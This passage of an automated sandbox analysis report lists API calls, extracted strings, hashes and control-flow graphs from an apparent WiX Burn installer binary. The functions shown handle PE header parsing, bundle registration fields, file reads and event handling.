                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorFileLastSize
                                                                                                                • String ID: fileutil.cpp
                                                                                                                • API String ID: 464720113-2967768451
                                                                                                                • Opcode ID: c960b0e387ff18a70c2745247adb1a1e0799a5b3f3aaef05965eb29bc985c009
                                                                                                                • Instruction ID: 6abab0d42ef0ddb9f9a17dec5ab9a3987802771224ab4d6f16219cc65d9917ca
                                                                                                                • Opcode Fuzzy Hash: c960b0e387ff18a70c2745247adb1a1e0799a5b3f3aaef05965eb29bc985c009
                                                                                                                • Instruction Fuzzy Hash: B7F0A47295413AAB97219F8AD90595AFBACFF14760B014166FD54AB300E770AD1087D4
                                                                                                                APIs
                                                                                                                • CLSIDFromProgID.OLE32(Microsoft.Update.AutoUpdate,009A5466,?,00000000,009A5466,?,?,?), ref: 009E3DA7
                                                                                                                • CoCreateInstance.OLE32(00000000,00000000,00000001,00A0716C,?), ref: 009E3DBF
                                                                                                                Strings
                                                                                                                • Microsoft.Update.AutoUpdate, xrefs: 009E3DA2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateFromInstanceProg
                                                                                                                • String ID: Microsoft.Update.AutoUpdate
                                                                                                                • API String ID: 2151042543-675569418
                                                                                                                • Opcode ID: 02456f5fad52db928aba83661e8237900121e8f87c99ada3a2cf55877bc0ac4c
                                                                                                                • Instruction ID: 829389be8e2c46583635e2db1415e8aa54283b74a1415d194b4eea3b35f53cf8
                                                                                                                • Opcode Fuzzy Hash: 02456f5fad52db928aba83661e8237900121e8f87c99ada3a2cf55877bc0ac4c
                                                                                                                • Instruction Fuzzy Hash: 6EF03A71A1520CBBDB00EFA9DD46EAFB7BCEB48710F404469EA01E7190D671AE0486B2
                                                                                                                APIs
                                                                                                                • GetProcAddress.KERNEL32(RegDeleteKeyExW,AdvApi32.dll), ref: 009E0E28
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc
                                                                                                                • String ID: AdvApi32.dll$RegDeleteKeyExW
                                                                                                                • API String ID: 190572456-850864035
                                                                                                                • Opcode ID: 321f48bb82db6522efc31a3c13e6b9b08e2394f29590dfc9e8869762b0c1c564
                                                                                                                • Instruction ID: 5f44a97cd2204039d9a695b3bcb9e6336412d571a09da87562cc723b5c06824d
                                                                                                                • Opcode Fuzzy Hash: 321f48bb82db6522efc31a3c13e6b9b08e2394f29590dfc9e8869762b0c1c564
                                                                                                                • Instruction Fuzzy Hash: B1E0EC709213ADAACB12DB95BE05B427E90E751B59F004524E4089A2B0DBB35C53CBA0
                                                                                                                APIs
                                                                                                                • EnterCriticalSection.KERNEL32(0029B5FC,00000000,?,?,?,?,0024E93B,8000FFFF,Unexpected return value from message pump.), ref: 0026FEF4
                                                                                                                • GetCurrentProcessId.KERNEL32(00000000,?,0024E93B,8000FFFF,Unexpected return value from message pump.), ref: 0026FF04
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 0026FF0D
                                                                                                                • GetLocalTime.KERNEL32(8000FFFF,?,0024E93B,8000FFFF,Unexpected return value from message pump.), ref: 0026FF23
                                                                                                                • LeaveCriticalSection.KERNEL32(0029B5FC,0024E93B,?,00000000,0000FDE9,?,0024E93B,8000FFFF,Unexpected return value from message pump.), ref: 0027001A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000011.00000002.2179813995.0000000000231000.00000020.00000001.01000000.00000011.sdmp, Offset: 00230000, based on PE: true
                                                                                                                • Associated: 00000011.00000002.2179506258.0000000000230000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2180693815.000000000027B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2181773914.000000000029A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2182538763.000000000029D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_17_2_230000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalCurrentSection$EnterLeaveLocalProcessThreadTime
                                                                                                                • String ID: $e)$%ls[%04X:%04X][%04hu-%02hu-%02huT%02hu:%02hu:%02hu]%hs%03d:%ls %ls%ls$(e)$,e)$0e)
                                                                                                                • API String ID: 296830338-115078034
                                                                                                                • Opcode ID: 0475187f4d6d36bcce0ee125409e092f697691e7dbd94f357d9a16ec56dcd1ee
                                                                                                                • Instruction ID: 88a4770235111039ec24173b6757852c545387cf1df3383b78689007d1500bcc
                                                                                                                • Opcode Fuzzy Hash: 0475187f4d6d36bcce0ee125409e092f697691e7dbd94f357d9a16ec56dcd1ee
                                                                                                                • Instruction Fuzzy Hash: E6419572D2121AEBDF219FA4ED49BBEB7B8EB08711F504025F904E6190D7349DA0DBA1
                                                                                                                Strings
                                                                                                                • Failed create working folder., xrefs: 0024A0EE
                                                                                                                • Failed to copy working folder., xrefs: 0024A116
                                                                                                                • Failed to calculate working folder to ensure it exists., xrefs: 0024A0D8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000011.00000002.2179813995.0000000000231000.00000020.00000001.01000000.00000011.sdmp, Offset: 00230000, based on PE: true
                                                                                                                • Associated: 00000011.00000002.2179506258.0000000000230000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2180693815.000000000027B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2181773914.000000000029A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2182538763.000000000029D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_17_2_230000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CurrentDirectoryErrorLastProcessWindows
                                                                                                                • String ID: Failed create working folder.$Failed to calculate working folder to ensure it exists.$Failed to copy working folder.
                                                                                                                • API String ID: 3841436932-2072961686
                                                                                                                • Opcode ID: e989d02ac7c64c90757161fe444bd98016962c9d94af3b85d573c04bb2f0199e
                                                                                                                • Instruction ID: bd62136bbd16aedfee36bba8b9d442131fb8f9b42c078190ada6ba6e0932ea6a
                                                                                                                • Opcode Fuzzy Hash: e989d02ac7c64c90757161fe444bd98016962c9d94af3b85d573c04bb2f0199e
                                                                                                                • Instruction Fuzzy Hash: 6B01D432961528FA8B27AE54DC0AC9EBB79DF55720F104295FC087A211DB719E30AB81

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 0 23f9e3-23fa14 call 2739af 3 23fa16 0->3 4 23fa18-23fa1a 0->4 3->4 5 23fa2e-23fa47 call 2732f3 4->5 6 23fa1c-23fa29 call 270237 4->6 12 23fa53-23fa68 call 2732f3 5->12 13 23fa49-23fa4e 5->13 11 23ff16-23ff1b 6->11 14 23ff23-23ff28 11->14 15 23ff1d-23ff1f 11->15 25 23fa74-23fa81 call 23ea42 12->25 26 23fa6a-23fa6f 12->26 16 23ff0d-23ff14 call 270237 13->16 19 23ff30-23ff35 14->19 20 23ff2a-23ff2c 14->20 15->14 28 23ff15 16->28 23 23ff37-23ff39 19->23 24 23ff3d-23ff41 19->24 20->19 23->24 29 23ff43-23ff46 call 275636 24->29 30 23ff4b-23ff52 24->30 33 23fa83-23fa88 25->33 34 23fa8d-23faa2 call 2732f3 25->34 26->16 28->11 29->30 33->16 37 23faa4-23faa9 34->37 38 23faae-23fac0 call 274c97 34->38 37->16 41 23fac2-23faca 38->41 42 23facf-23fae4 call 2732f3 38->42 43 23fd99-23fda2 call 270237 41->43 48 23faf0-23fb05 call 2732f3 42->48 49 23fae6-23faeb 42->49 43->28 52 23fb11-23fb23 call 273505 48->52 53 23fb07-23fb0c 48->53 49->16 56 23fb25-23fb2a 52->56 57 23fb2f-23fb45 call 2739af 52->57 53->16 56->16 60 23fdf4-23fe0e call 23ecbe 57->60 61 23fb4b-23fb4d 57->61 67 23fe10-23fe15 60->67 68 23fe1a-23fe32 call 2739af 60->68 62 23fb59-23fb6e call 273505 61->62 63 23fb4f-23fb54 61->63 70 23fb70-23fb75 62->70 71 23fb7a-23fb8f call 2732f3 62->71 63->16 67->16 76 23fe38-23fe3a 68->76 77 23fefc-23fefd call 23f0f8 68->77 70->16 78 23fb91-23fb93 71->78 79 23fb9f-23fbb4 call 2732f3 71->79 80 23fe46-23fe64 call 2732f3 76->80 81 23fe3c-23fe41 76->81 86 23ff02-23ff06 77->86 78->79 83 23fb95-23fb9a 78->83 90 23fbb6-23fbb8 79->90 91 23fbc4-23fbd9 call 2732f3 79->91 92 23fe70-23fe88 call 2732f3 80->92 93 23fe66-23fe6b 80->93 81->16 83->16 86->28 89 23ff08 86->89 89->16 90->91 94 23fbba-23fbbf 90->94 101 23fbdb-23fbdd 91->101 102 23fbe9-23fbfe call 2732f3 91->102 99 23fe95-23fead call 2732f3 92->99 100 23fe8a-23fe8c 92->100 93->16 94->16 109 23feba-23fed2 call 2732f3 99->109 110 23feaf-23feb1 99->110 100->99 105 23fe8e-23fe93 100->105 101->102 106 23fbdf-23fbe4 101->106 111 23fc00-23fc02 102->111 112 23fc0e-23fc23 call 2732f3 102->112 105->16 106->16 119 23fed4-23fed9 109->119 120 23fedb-23fef3 call 2732f3 109->120 110->109 113 23feb3-23feb8 110->113 111->112 114 23fc04-23fc09 111->114 121 23fc33-23fc48 call 2732f3 112->121 122 23fc25-23fc27 112->122 113->16 114->16 119->16 120->77 128 23fef5-23fefa 120->128 129 23fc4a-23fc4c 121->129 130 23fc58-23fc6d call 2732f3 121->130 122->121 124 23fc29-23fc2e 122->124 124->16 128->16 129->130 132 23fc4e-23fc53 129->132 134 23fc6f-23fc71 130->134 135 23fc7d-23fc92 call 2732f3 130->135 132->16 134->135 136 23fc73-23fc78 134->136 139 23fca2-23fcba call 2732f3 135->139 140 23fc94-23fc96 135->140 136->16 144 23fcca-23fce2 call 2732f3 139->144 145 23fcbc-23fcbe 139->145 140->139 141 23fc98-23fc9d 140->141 141->16 149 23fcf2-23fd07 call 2732f3 144->149 150 23fce4-23fce6 144->150 145->144 146 23fcc0-23fcc5 145->146 146->16 154 23fda7-23fda9 149->154 155 23fd0d-23fd2a CompareStringW 149->155 150->149 151 23fce8-23fced 150->151 151->16 156 23fdb4-23fdb6 154->156 157 23fdab-23fdb2 154->157 158 23fd34-23fd49 CompareStringW 155->158 159 23fd2c-23fd32 155->159 160 23fdc2-23fdda call 273505 156->160 161 23fdb8-23fdbd 156->161 157->156 163 23fd57-23fd6c CompareStringW 158->163 164 23fd4b-23fd55 158->164 162 23fd75-23fd7a 159->162 160->60 170 23fddc-23fdde 160->170 161->16 162->156 166 23fd6e 163->166 167 23fd7c-23fd94 call 233821 163->167 164->162 166->162 167->43 172 23fde0-23fde5 170->172 173 23fdea 170->173 172->16 173->60
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000011.00000002.2179813995.0000000000231000.00000020.00000001.01000000.00000011.sdmp, Offset: 00230000, based on PE: true
                                                                                                                • Associated: 00000011.00000002.2179506258.0000000000230000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2180693815.000000000027B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2181773914.000000000029A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2182538763.000000000029D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_17_2_230000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: StringVariant$AllocClearFreeInit
                                                                                                                • String ID: AboutUrl$Arp$Classification$Comments$Contact$Department$DisableModify$DisableRemove$DisplayName$DisplayVersion$ET#$ExecutableName$Failed to get @AboutUrl.$Failed to get @Classification.$Failed to get @Comments.$Failed to get @Contact.$Failed to get @Department.$Failed to get @DisableModify.$Failed to get @DisableRemove.$Failed to get @DisplayName.$Failed to get @DisplayVersion.$Failed to get @ExecutableName.$Failed to get @HelpLink.$Failed to get @HelpTelephone.$Failed to get @Id.$Failed to get @Manufacturer.$Failed to get @Name.$Failed to get @ParentDisplayName.$Failed to get @PerMachine.$Failed to get @ProductFamily.$Failed to get @ProviderKey.$Failed to get @Publisher.$Failed to get @Register.$Failed to get @Tag.$Failed to get @UpdateUrl.$Failed to get @Version.$Failed to parse @Version: %ls$Failed to parse related bundles$Failed to parse software tag.$Failed to select ARP node.$Failed to select Update node.$Failed to select registration node.$Failed to set registration paths.$HelpLink$HelpTelephone$Invalid modify disabled type: %ls$Manufacturer$Name$ParentDisplayName$PerMachine$ProductFamily$ProviderKey$Publisher$Register$Registration$Tag$Update$UpdateUrl$Version$button$clbcatq.dll$msasn1.dll$registration.cpp$yes
                                                                                                                • API String ID: 760788290-2101389847
                                                                                                                • Opcode ID: 4834f8b5dade70678333044b8b2568441ce8be0feba5b91627d92b5fc01e9280
                                                                                                                • Instruction ID: 8dd47335484fa2f2d2947cfb7f6a37ca53ee54bebab6c9f29abae8518f729b1f
                                                                                                                • Opcode Fuzzy Hash: 4834f8b5dade70678333044b8b2568441ce8be0feba5b91627d92b5fc01e9280
                                                                                                                • Instruction Fuzzy Hash: 03E157B6E75236BACB51AAA0DE42EADB6A86F02710F114232FD14F35D1C7B19D3197C0

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 174 23b48b-23b500 call 25f8e0 * 2 179 23b502-23b50c GetLastError 174->179 180 23b538-23b53e 174->180 181 23b519 179->181 182 23b50e-23b517 179->182 183 23b542-23b554 SetFilePointerEx 180->183 184 23b540 180->184 187 23b520-23b52d call 233821 181->187 188 23b51b 181->188 182->181 185 23b556-23b560 GetLastError 183->185 186 23b588-23b5a2 ReadFile 183->186 184->183 189 23b562-23b56b 185->189 190 23b56d 185->190 191 23b5a4-23b5ae GetLastError 186->191 192 23b5d9-23b5e0 186->192 205 23b532-23b533 187->205 188->187 189->190 196 23b574-23b586 call 233821 190->196 197 23b56f 190->197 198 23b5b0-23b5b9 191->198 199 23b5bb 191->199 194 23bbd7-23bbeb call 233821 192->194 195 23b5e6-23b5ef 192->195 213 23bbf0 194->213 195->194 201 23b5f5-23b605 SetFilePointerEx 195->201 196->205 197->196 198->199 203 23b5c2-23b5d4 call 233821 199->203 204 23b5bd 199->204 207 23b607-23b611 GetLastError 201->207 208 23b63c-23b654 ReadFile 201->208 203->205 204->203 211 23bbf1-23bbf7 call 270237 205->211 215 23b613-23b61c 207->215 216 23b61e 207->216 217 23b656-23b660 GetLastError 208->217 218 23b68b-23b692 208->218 227 23bbf8-23bc0a call 25e06f 211->227 213->211 215->216 223 23b620 216->223 224 23b625-23b632 call 233821 216->224 225 23b662-23b66b 217->225 226 23b66d 217->226 221 23b698-23b6a2 218->221 222 23bbbc-23bbd5 call 233821 218->222 221->222 228 23b6a8-23b6cb SetFilePointerEx 221->228 222->213 223->224 224->208 225->226 231 23b674-23b681 call 233821 226->231 232 23b66f 226->232 235 23b702-23b71a ReadFile 228->235 236 23b6cd-23b6d7 GetLastError 228->236 231->218 232->231 243 23b751-23b769 ReadFile 235->243 244 23b71c-23b726 GetLastError 235->244 241 23b6e4 236->241 242 23b6d9-23b6e2 236->242 249 23b6e6 241->249 250 23b6eb-23b6f8 call 233821 241->250 242->241 247 23b7a0-23b7bb SetFilePointerEx 243->247 248 23b76b-23b775 GetLastError 243->248 245 23b733 244->245 246 23b728-23b731 244->246 253 23b735 245->253 254 23b73a-23b747 call 233821 245->254 246->245 251 23b7f5-23b814 ReadFile 247->251 252 23b7bd-23b7c7 GetLastError 247->252 255 23b782 248->255 256 23b777-23b780 248->256 249->250 250->235 261 23b81a-23b81c 251->261 262 23bb7d-23bb87 GetLastError 251->262 258 23b7d4 252->258 259 23b7c9-23b7d2 252->259 253->254 254->243 263 23b784 255->263 264 23b789-23b796 call 233821 255->264 256->255 268 23b7d6 258->268 269 23b7db-23b7eb call 233821 258->269 259->258 271 23b81d-23b824 261->271 266 23bb94 262->266 267 23bb89-23bb92 262->267 263->264 264->247 273 23bb96 266->273 274 23bb9b-23bbb1 call 233821 266->274 267->266 268->269 269->251 276 23b82a-23b836 271->276 277 23bb58-23bb75 call 233821 271->277 273->274 293 23bbb2-23bbba call 270237 274->293 281 23b841-23b84a 276->281 282 23b838-23b83f 276->282 294 23bb7a-23bb7b 277->294 287 23b850-23b876 ReadFile 281->287 288 23bb1b-23bb32 call 233821 281->288 282->281 285 23b884-23b88b 282->285 290 23b8b4-23b8cb call 23394f 285->290 291 23b88d-23b8af call 233821 285->291 287->262 289 23b87c-23b882 287->289 300 23bb37-23bb3d call 270237 288->300 289->271 304 23b8ef-23b904 SetFilePointerEx 290->304 305 23b8cd-23b8ea call 233821 290->305 291->294 293->227 294->293 310 23bb43-23bb44 300->310 308 23b906-23b910 GetLastError 304->308 309 23b944-23b969 ReadFile 304->309 305->211 314 23b912-23b91b 308->314 315 23b91d 308->315 311 23b9a0-23b9ac 309->311 312 23b96b-23b975 GetLastError 309->312 316 23bb45-23bb47 310->316 319 23b9cf-23b9d3 311->319 320 23b9ae-23b9ca call 233821 311->320 317 23b982 312->317 318 23b977-23b980 312->318 314->315 321 23b924-23b934 call 233821 315->321 322 23b91f 315->322 316->227 327 23bb4d-23bb53 call 233a16 316->327 328 23b984 317->328 329 23b989-23b99e call 233821 317->329 318->317 325 23b9d5-23ba09 call 233821 call 270237 319->325 326 23ba0e-23ba21 call 274a05 319->326 320->300 336 23b939-23b93f call 270237 321->336 322->321 325->316 343 23ba23-23ba28 326->343 344 23ba2d-23ba37 326->344 327->227 328->329 329->336 336->310 343->336 347 23ba41-23ba49 344->347 348 23ba39-23ba3f 344->348 350 23ba55-23ba58 347->350 351 23ba4b-23ba53 347->351 349 23ba5a-23baba call 23394f 348->349 354 23bade-23baff call 25f360 call 23b208 349->354 355 23babc-23bad8 call 233821 349->355 350->349 351->349 354->316 362 23bb01-23bb11 call 233821 354->362 355->354 362->288
                                                                                                                APIs
                                                                                                                • GetLastError.KERNEL32(?,?,?,00000000,76EEC3F0,00000000), ref: 0023B502
                                                                                                                • SetFilePointerEx.KERNELBASE(000000FF,00000000,00000000,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0023B550
                                                                                                                • GetLastError.KERNEL32(?,?,?,00000000,76EEC3F0,00000000), ref: 0023B556
                                                                                                                • ReadFile.KERNELBASE(00000000,aD#H,00000040,?,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0023B59E
                                                                                                                • GetLastError.KERNEL32(?,?,?,00000000,76EEC3F0,00000000), ref: 0023B5A4
                                                                                                                • SetFilePointerEx.KERNELBASE(00000000,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0023B601
                                                                                                                • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0023B607
                                                                                                                • ReadFile.KERNELBASE(00000000,?,00000018,00000040,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0023B650
                                                                                                                • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0023B656
                                                                                                                • SetFilePointerEx.KERNELBASE(00000000,-00000098,00000000,00000000,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0023B6C7
                                                                                                                • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0023B6CD
                                                                                                                • ReadFile.KERNEL32(00000000,?,00000004,00000018,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0023B716
                                                                                                                • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0023B71C
                                                                                                                • ReadFile.KERNEL32(00000000,?,00000004,00000018,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0023B765
                                                                                                                • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0023B76B
                                                                                                                • SetFilePointerEx.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0023B7B7
                                                                                                                • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0023B7BD
                                                                                                                  • Part of subcall function 0023394F: GetProcessHeap.KERNEL32(?,?,?,00232274,?,00000001,75C0B390,8000FFFF,?,?,00270267,?,?,00000000,00000000,8000FFFF), ref: 00233960
                                                                                                                  • Part of subcall function 0023394F: RtlAllocateHeap.NTDLL(00000000,?,00232274,?,00000001,75C0B390,8000FFFF,?,?,00270267,?,?,00000000,00000000,8000FFFF), ref: 00233967
                                                                                                                • ReadFile.KERNEL32(00000000,?,00000028,00000018,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0023B810
                                                                                                                • ReadFile.KERNEL32(00000000,?,00000028,00000028,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0023B872
                                                                                                                • SetFilePointerEx.KERNELBASE(00000000,?,00000000,00000000,00000000,00000034,00000001,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0023B8FC
                                                                                                                • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0023B906
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000011.00000002.2179813995.0000000000231000.00000020.00000001.01000000.00000011.sdmp, Offset: 00230000, based on PE: true
                                                                                                                • Associated: 00000011.00000002.2179506258.0000000000230000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2180693815.000000000027B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2181773914.000000000029A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2182538763.000000000029D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_17_2_230000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$ErrorLast$Read$Pointer$Heap$AllocateProcess
                                                                                                                • String ID: ($.wix$4$Failed to allocate buffer for section info.$Failed to allocate memory for container sizes.$Failed to find Burn section.$Failed to find valid DOS image header in buffer.$Failed to find valid NT image header in buffer.$Failed to get total size of bundle.$Failed to open handle to engine process path.$Failed to read DOS header.$Failed to read NT header.$Failed to read complete image section header, index: %u$Failed to read complete section info.$Failed to read image section header, index: %u$Failed to read section info, data to short: %u$Failed to read section info, unsupported version: %08x$Failed to read section info.$Failed to read signature offset.$Failed to read signature size.$Failed to seek past optional headers.$Failed to seek to NT header.$Failed to seek to section info.$Failed to seek to start of file.$PE$PE Header from file didn't match PE Header in memory.$aD#H$burn$section.cpp
                                                                                                                • API String ID: 3411815225-4239444621
                                                                                                                • Opcode ID: 56d23297e756ad4b2c5afa75c24b40ebc4411d582035abdbdfdced52899856bc
                                                                                                                • Instruction ID: 48e16ec01b1cdcbccc4d86db50688f6bffd3fee1459c4239de1c451b1ab90a3c
                                                                                                                • Opcode Fuzzy Hash: 56d23297e756ad4b2c5afa75c24b40ebc4411d582035abdbdfdced52899856bc
                                                                                                                • Instruction Fuzzy Hash: D012C8B6A70235ABDB329E548C4AFAA7664AF45720F114195FE08FB281D770DD60CFE0

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 365 250d16-250d2d SetEvent 366 250d6f-250d7d WaitForSingleObject 365->366 367 250d2f-250d39 GetLastError 365->367 370 250db4-250dbf ResetEvent 366->370 371 250d7f-250d89 GetLastError 366->371 368 250d46 367->368 369 250d3b-250d44 367->369 372 250d4d-250d5d call 233821 368->372 373 250d48 368->373 369->368 374 250dc1-250dcb GetLastError 370->374 375 250df9-250dff 370->375 376 250d96 371->376 377 250d8b-250d94 371->377 395 250d62-250d6a call 270237 372->395 373->372 378 250dcd-250dd6 374->378 379 250dd8 374->379 381 250e01-250e04 375->381 382 250e32-250e4b call 2321ac 375->382 383 250d9d-250db2 call 233821 376->383 384 250d98 376->384 377->376 378->379 387 250ddf-250df4 call 233821 379->387 388 250dda 379->388 390 250e06-250e23 call 233821 381->390 391 250e28-250e2d 381->391 398 250e63-250e6e SetEvent 382->398 399 250e4d-250e5e call 270237 382->399 383->395 384->383 387->395 388->387 405 2510de-2510e4 call 270237 390->405 392 2510e8-2510ed 391->392 400 2510f2-2510f8 392->400 401 2510ef 392->401 395->392 407 250e70-250e7a GetLastError 398->407 408 250ea8-250eb6 WaitForSingleObject 398->408 419 2510e5-2510e7 399->419 401->400 405->419 414 250e87 407->414 415 250e7c-250e85 407->415 410 250ef0-250efb ResetEvent 408->410 411 250eb8-250ec2 GetLastError 408->411 420 250f35-250f3c 410->420 421 250efd-250f07 GetLastError 410->421 416 250ec4-250ecd 411->416 417 250ecf 411->417 422 250e8e-250ea3 call 233821 414->422 423 250e89 414->423 415->414 416->417 426 250ed6-250eeb call 233821 417->426 427 250ed1 417->427 419->392 424 250f3e-250f41 420->424 425 250fab-250fce CreateFileW 420->425 428 250f14 421->428 429 250f09-250f12 421->429 448 2510dd 422->448 423->422 431 250f43-250f46 424->431 432 250f6e-250f7c call 23394f 424->432 437 250fd0-250fda GetLastError 425->437 438 25100b-25101f SetFilePointerEx 425->438 426->448 427->426 434 250f16 428->434 435 250f1b-250f30 call 233821 428->435 429->428 441 250f67-250f69 431->441 442 250f48-250f4b 431->442 463 250f9d-250fa6 432->463 464 250f7e-250f98 call 233821 432->464 434->435 435->448 439 250fe7 437->439 440 250fdc-250fe5 437->440 445 251021-25102b GetLastError 438->445 446 251059-251064 SetEndOfFile 438->446 451 250fee-251001 call 233821 439->451 452 250fe9 439->452 440->439 441->392 453 250f5d-250f62 442->453 454 250f4d-250f53 442->454 456 25102d-251036 445->456 457 251038 445->457 449 251066-251070 GetLastError 446->449 450 25109b-2510a8 SetFilePointerEx 446->450 448->405 459 251072-25107b 449->459 460 25107d 449->460 450->419 462 2510aa-2510b4 GetLastError 450->462 451->438 452->451 453->419 454->453 456->457 465 25103f-251054 call 233821 457->465 466 25103a 457->466 459->460 467 251084-251099 call 233821 460->467 468 25107f 460->468 470 2510b6-2510bf 462->470 471 2510c1 462->471 463->419 464->448 465->448 466->465 467->448 468->467 470->471 475 2510c3 471->475 476 2510c8-2510d8 call 233821 471->476 475->476 476->448
                                                                                                                APIs
                                                                                                                • SetEvent.KERNEL32(?,?,?,?,?,002508BC,?,?), ref: 00250D25
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,002508BC,?,?), ref: 00250D2F
                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,002508BC,?,?), ref: 00250D74
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,002508BC,?,?), ref: 00250D7F
                                                                                                                • ResetEvent.KERNEL32(?,?,?,?,?,002508BC,?,?), ref: 00250DB7
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,002508BC,?,?), ref: 00250DC1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000011.00000002.2179813995.0000000000231000.00000020.00000001.01000000.00000011.sdmp, Offset: 00230000, based on PE: true
                                                                                                                • Associated: 00000011.00000002.2179506258.0000000000230000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2180693815.000000000027B000.00000002.00000001.01000000.00000011.sdmpDownload File
